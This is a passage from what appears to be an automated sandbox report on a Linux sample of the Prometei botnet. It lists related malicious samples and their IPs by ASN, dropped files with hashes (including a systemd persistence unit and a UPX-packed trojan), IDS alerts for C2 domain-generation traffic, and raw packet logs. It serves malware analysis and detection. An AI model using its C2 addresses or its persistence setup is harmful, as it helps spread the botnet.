	na.elf	Get hash	malicious	Prometei	Browse	52.26.80.133
	na.elf	Get hash	malicious	Prometei	Browse	52.26.80.133
	na.elf	Get hash	malicious	Prometei	Browse	52.26.80.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	Presentation Of Court Order_Letter.pptx	Get hash	malicious	HTMLPhisher	Browse	35.182.220.38
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	https://www.canva.com/design/DAGjR3xjHjQ/Jz3hsdYd1wfGuO7V0r6_Zw/view?utm_content=DAGjR3xjHjQ&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h5790724d57	Get hash	malicious	Unknown	Browse	18.238.4.43
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	na.elf	Get hash	malicious	Prometei	Browse	34.243.160.129
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	boatnet.arm6.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	HSBC-COPY-INT-WIRE_USD18,794.67 Deposit 35%.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
AMAZON-02US	Presentation Of Court Order_Letter.pptx	Get hash	malicious	HTMLPhisher	Browse	35.182.220.38
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	https://www.canva.com/design/DAGjR3xjHjQ/Jz3hsdYd1wfGuO7V0r6_Zw/view?utm_content=DAGjR3xjHjQ&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h5790724d57	Get hash	malicious	Unknown	Browse	18.238.4.43
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	na.elf	Get hash	malicious	Prometei	Browse	34.243.160.129
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	boatnet.arm6.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	HSBC-COPY-INT-WIRE_USD18,794.67 Deposit 35%.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
STRATOSTRATOAGDE	Presentation Of Court Order_Letter.pptx	Get hash	malicious	HTMLPhisher	Browse	85.214.3.95
	Presentation Of Court Order_Letter.pptx	Get hash	malicious	HTMLPhisher	Browse	85.214.3.95
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
FASTLYUS	l7vmra.elf	Get hash	malicious	Unknown	Browse	199.232.90.49
	na.elf	Get hash	malicious	Prometei	Browse	199.232.90.49
	na.elf	Get hash	malicious	Prometei	Browse	199.232.90.49
	http://APP.IT	Get hash	malicious	Unknown	Browse	199.232.89.229
	na.elf	Get hash	malicious	Prometei	Browse	199.232.90.49
	na.elf	Get hash	malicious	Prometei	Browse	199.232.38.49
	na.elf	Get hash	malicious	Prometei	Browse	199.232.38.49
	na.elf	Get hash	malicious	Prometei	Browse	199.232.90.49
	https://get-razzed.online/krc	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://www.notion.so/loginwithemail?state%3Dv02%253Atemp_password%253AoMxvN1rDtJtCsgmtOezqMfwaMgP0Mi85Ztuq46xjKGwCLHja2k5SSVVFts0UZYrOcRv_CMCqmbA1CScbU-5b-N_gG0m3QbS2OxpSa0yi50-ycbev4dugfPfBEvCTxo9iBUYryzJkxnekptut2ZBzY7DzlNI3EVfOIHa9bfsc9hLlIG7HffWNvxq7rb6S4i3L_9RVB0XX-0_kCGUesHr7CDC0oRMVDAByZYgYcq-_NJYYCFuBxQ%26redirectUrl%3D%252F4a4146f9bfe14aef8476d79d45fc399e%26password%3D738380%26isSignup%3Dfalse%26isMicrosoft%3Dfalse	Get hash	malicious	Unknown	Browse	151.101.45.140
NCRENUS	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/CommId

Download File

Process:	/usr/sbin/uplugplay
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.702819531114783
Encrypted:	false
SSDEEP:	3:GSMan:GSMan
MD5:	8CB4141C32B8D6CACF72EA97B130F8A0
SHA1:	72F81A2E67A1D0A52DEE87EF3682E89D6D9FA176
SHA-256:	2C392FF923D28B06476D2A2254ED5D37CE7F450957D9457580066B6E7D05917C
SHA-512:	E6D9FFD7FE63C124DDA077D5D761511DD41FE51AE08FC71F0A64D035DC42AD34354B119DD1654087F5ECAD2287434B0B8419ADA438F591F8CD73C73612354733
Malicious:	true
Reputation:	low
Preview:	HG6TD1RQ3I303VPA

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	high, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/usr/lib/systemd/system/uplugplay.service

Download File

Process:	/tmp/na.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.769509838572339
Encrypted:	false
SSDEEP:	3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
MD5:	8CA62D1F47880BCE036C2956C9B7B272
SHA1:	3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
SHA-256:	C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
SHA-512:	4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.

/usr/sbin/uplugplay

Download File

Process:	/tmp/na.elf
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	435932
Entropy (8bit):	7.942808419350539
Encrypted:	false
SSDEEP:	6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgc:25WOSACZSV6eKRH5EPiamb4DsDwwcM
MD5:	2BC8E60AB00C639DA1F3C93F8843E04E
SHA1:	892AEEAAF1770F391B694088CF70D2E20BEF1CAA
SHA-256:	1AF93251F5622164252F068BF56AC2B86E5056973C33C9A4BA3FD69F41850935
SHA-512:	3CB3D0455C765575E8352286C1DC936225D79FF6B1E80BE1E041CF8101D702327EC5F9165B90CE18D1D2DCA4EC056B648E3C3021D54B649F7FA0996B7775B78E
Malicious:	true
Yara Hits:	Rule: Linux_Trojan_Dofloo_ac3333d1, Description: unknown, Source: /usr/sbin/uplugplay, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	low
Preview:	.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v..p............. ..ELF......>....@.......0..'8..........W.3c..-.......o..K>...@!v..{_bo./.O7.%....o.....l..-.R..XOH....6..o..p..@... ....om.r2...D_..n.D...O...M(.S.td...POQn..PpnG.oRO!..=.0...%I.$...@.P.............y......GNU....'..l......?D....N...k.n..m"c...i......._....R.%..y...#N./ $../..p.E....v!#...._..r....K....../0.\|.....p.L.........H...._...#/v..._P.C2.b.`....y!.K...x!...@p.2.".oh...`......X.B.C;P_.L/H....@...N..8?.0O.C;.`(...q.\. ..O.$ar .@%I.!v...}...I&.n.......H...H...H..t..."...9.....?..%.....D................................}....ume....]U....ME=....5-%...................&..E.t$..T$.<{....%.....H.\|$...~.9.g...Sd2.OH.. ......kn(...$. 1.H9..+..t>d....4..u......~2..w..H.. mU.H.=d...o...V..`...V..=[._w.Ru6..O

/var/lib/fwupd/gnupg/.#lk0x000055e17e839b80.galassia.5501

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.0086949695628418
Encrypted:	false
SSDEEP:	3:N/MChvn:bvn
MD5:	AD4B931C4E46666EECCF909A22055154
SHA1:	E6B3791E3FF7F5E2BF617F544F0A81463F20E192
SHA-256:	36A32E64096242BD0C0350414B503FBCC43EC1E19FFBF0B277B8C154071C1A26
SHA-512:	8DF86DA1A90BBB87597E79DB1C843A61C4CBFD5BDAE502D43128FE15FF20269C250E32A9EA830C3D75D8A523962F00C151FA77592B708CBC0D15DC317C78DB11
Malicious:	false
Reputation:	low
Preview:	5501.galassia.

/var/lib/fwupd/gnupg/.#lk0x0000560caad68b80.galassia.5522

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	2.908694969562842
Encrypted:	false
SSDEEP:	3:N/mB/vn:gvn
MD5:	95BE4ABEC4869126C366CBABB9A0C975
SHA1:	7D5D030F913034790E3E8627E5397D030AE95904
SHA-256:	A4E937AFAEB495E2DCBBC2E68C0351265F261EFBC213DB8DD04EE5E01EE5A254
SHA-512:	82E5125FE74A929F973904270182CFD074079A75C5E4EEA38E038C009F4ABDF221DBBEEEBB9B0AB28B91A1522947283615D93EAC5E715C40313F109AB1C40052
Malicious:	false
Reputation:	low
Preview:	5522.galassia.

/var/lib/fwupd/gnupg/.#lk0x00005628bd044b80.galassia.5503

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.0086949695628418
Encrypted:	false
SSDEEP:	3:N/qpIvn:oIvn
MD5:	1E360291A332AC7A7BBC0C2C8CADD790
SHA1:	C29D998BC35207A0A888E98C61A2022CB0BD55E7
SHA-256:	14C9E0AC0F1B9BF72E3818BDDF7643849D313DE0B4F0D90AC86493DEBB35EE2C
SHA-512:	6A4489F92C329D40866FD04DCDFDC9C02BE68FD9CFFCFAD671E855EE8BA98A4BE6214BC65F7BF87E9C8273A596AE11BB221A40BE6EA495C7CB2B8BCC18B816CC
Malicious:	false
Reputation:	low
Preview:	5503.galassia.

/var/lib/fwupd/gnupg/.#lk0x00005630efaf2b80.galassia.5509

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.0086949695628418
Encrypted:	false
SSDEEP:	3:N/Up/wvn:e/wvn
MD5:	89C35452AA29F73DFAACF60D28B91C15
SHA1:	9B1964A52E7449BC3A59BDCE87B19F817A7C7356
SHA-256:	D62E0D5995A918454DAE42183713301E343774951CE59CE181741F62C39B768B
SHA-512:	627B2BE1317595440C0DDF14019C44D6FB8402D120BDD0F129DC8C15B73C5BE2C78E3A0BB8AB018E18F06B415F2402A6F957D52A4065F6DC2E8CC9482BAA355A
Malicious:	false
Reputation:	low
Preview:	5509.galassia.

/var/lib/fwupd/gnupg/pubring.kbx.tmp

Download File

Process:	/usr/bin/gpg
File Type:	GPG keybox database version 1, created-at Tue Aug 17 14:04:41 2021, last-maintained Mon Mar 31 09:38:16 2025
Category:	dropped
Size (bytes):	2534
Entropy (8bit):	7.6198373684659675
Encrypted:	false
SSDEEP:	48:sO4Z3Buh7g8ZMUfN1i9N+EvbYJYv20hIhoRU3h0LJv9ARRt:7wUc8ZM+Y+AbcoRU3CARRt
MD5:	185336F91C3455D50864950352B92C84
SHA1:	4630538D4B35192A451CF3E54498AB5E184D1F51
SHA-256:	59E26ABDF17AB33014708E686C13AC55FBAA8ACA2E47EA70593D498CF22F3F1A
SHA-512:	F48AE840BDB989D6BE3FC8721ABAB501E6FC09BE3FB2EACF663686981A7E2A405A442FA3F39DA3FBF8F5444A1A5571D2DFD49723AC6B6E0AB2EA906414D7C0A0
Malicious:	false
Preview:	... ....KBXf....a...g.b....................^........?..A..../.H...E8..... .............~............................a...........U.........T.x8.sU....K'....F....l...K....cL.`Y......=....^~.5\|.%.......2..../.h..O..T........'.6E....HV..?.6l.......e..1o.O.,Y3....1,..a4..\|..s.w......f2......gaIK..i...x.T...~..W..N."..Z..ia!..V..so.....<.6j..........3C&..t1..Gf...j..z...U.........gpg.........Linux Vendor Firmware Service <sign@fwupd.org>....gpg.........7.....!..U..................................H...E8..c....d.....d.....3....a..y..?...........l...1/...)......T.f....-..UoxT... .v...\|...7.....d..PB..>..W{...-..R....&S.....~..2.ps.8:...{..^{?..@.?..e6....y...c.Rw.SK.F.;U)...A..S> an....W.?.\|.{.dB....x~B...V....O....'./!...\|;...Xw.:.!.p,n.A.H\..\...).....gpg......z.......D<............~...$......B.Y..A...n.m...o=.... ......8>4.G8E..L...+G..Z...<.................Z............................a...........[.......I....DR:....!._.P..`.1..6.9..G....O.y.?.......

Static File Info

General

File type:
Entropy (8bit):	7.942808419350539
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	na.elf
File size:	435'932 bytes
MD5:	2bc8e60ab00c639da1f3c93f8843e04e
SHA1:	892aeeaaf1770f391b694088cf70d2e20bef1caa
SHA256:	1af93251f5622164252f068bf56ac2b86e5056973c33c9a4ba3fd69f41850935
SHA512:	3cb3d0455c765575e8352286c1dc936225d79ff6b1e80be1e041cf8101d702327ec5f9165b90ce18d1d2dca4ec056b648e3c3021d54b649f7fa0996b7775b78e
SSDEEP:	6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgc:25WOSACZSV6eKRH5EPiamb4DsDwwcM
TLSH:	609423F8C87D2E3098169F3CBB1A826CF0A15772D9562F6EB51AE5732179F1FAC60101
File Content Preview:	.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v.

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-31T11:38:18.228892+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.14	40758	152.36.128.18	80	TCP
2025-03-31T11:38:21.446191+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.14	40760	152.36.128.18	80	TCP
2025-03-31T11:40:22.887934+0200	2044560	ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern	1	192.168.2.14	36645	8.8.8.8	53	UDP
2025-03-31T11:40:22.987843+0200	2044560	ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern	1	192.168.2.14	44448	8.8.8.8	53	UDP
2025-03-31T11:40:23.095566+0200	2044560	ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern	1	192.168.2.14	36531	8.8.8.8	53	UDP
2025-03-31T11:40:23.675648+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.14	46510	52.26.80.133	80	TCP
2025-03-31T11:40:23.906965+0200	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	52.26.80.133	80	192.168.2.14	46510	TCP
2025-03-31T11:40:23.906965+0200	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	52.26.80.133	80	192.168.2.14	46510	TCP
2025-03-31T11:40:24.690086+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.14	44132	85.214.228.140	80	TCP

Network Port Distribution

Total Packets: 186
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 31, 2025 11:38:01.761112928 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:01.761418104 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:01.884069920 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:01.884291887 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:01.985410929 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:01.985477924 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.002063990 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.002140999 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.089008093 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.089126110 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.116439104 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.116485119 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.193387985 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.193614960 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.226368904 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.226483107 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.301945925 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.302170992 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.316303015 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.316497087 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.403398037 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.403669119 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.421566963 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.421670914 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.503132105 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.503295898 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.525646925 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.525734901 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.608295918 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.608494997 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.653059959 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.653264999 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.708170891 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.708343983 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.756848097 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.757036924 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.808933020 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.852878094 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.857633114 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.948848963 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:02.951385021 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.967837095 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:02.968009949 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.046112061 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.067194939 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.067325115 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.097032070 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.169382095 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.169503927 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.191494942 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.248821974 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.272588968 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.291352987 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.291569948 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.347131968 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.425714016 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.425880909 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.526156902 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.526272058 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.526295900 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.526350021 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.626023054 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.627182961 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.732553005 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.732722044 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.834163904 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.834343910 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:03.937009096 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:03.937180042 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.039870977 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.039958000 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.143487930 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.143539906 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.253573895 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.253634930 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.357012033 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.357069016 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.460827112 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.460879087 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.568030119 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.568084002 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.670129061 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.670195103 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.695830107 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.695872068 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.773956060 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.774020910 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.803452969 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.803499937 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.875596046 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.875730038 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.895412922 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.895525932 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.922590971 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.922665119 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:04.974935055 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.996690989 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:04.996814966 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.029619932 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.084645987 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.097404957 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.097431898 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.097563028 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.209470987 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.209497929 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.209532976 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.209532976 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.635516882 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.635651112 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.752743006 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.752882957 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.759368896 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.759459019 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.855330944 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.855453014 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:05.877851009 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:05.878108978 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.272654057 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.272728920 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.377048016 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.377480030 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.477545977 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.477787018 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.503650904 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.503809929 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.577555895 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.577683926 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.607321978 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.607413054 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.676152945 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.676230907 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.777537107 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.777587891 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.790946960 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.791040897 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.894335032 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.894396067 CEST	37348	443	192.168.2.14	199.232.90.49
Mar 31, 2025 11:38:06.996009111 CEST	443	37348	199.232.90.49	192.168.2.14
Mar 31, 2025 11:38:06.996133089 CEST	37348	443	192.168.2.14	199.232.90.49
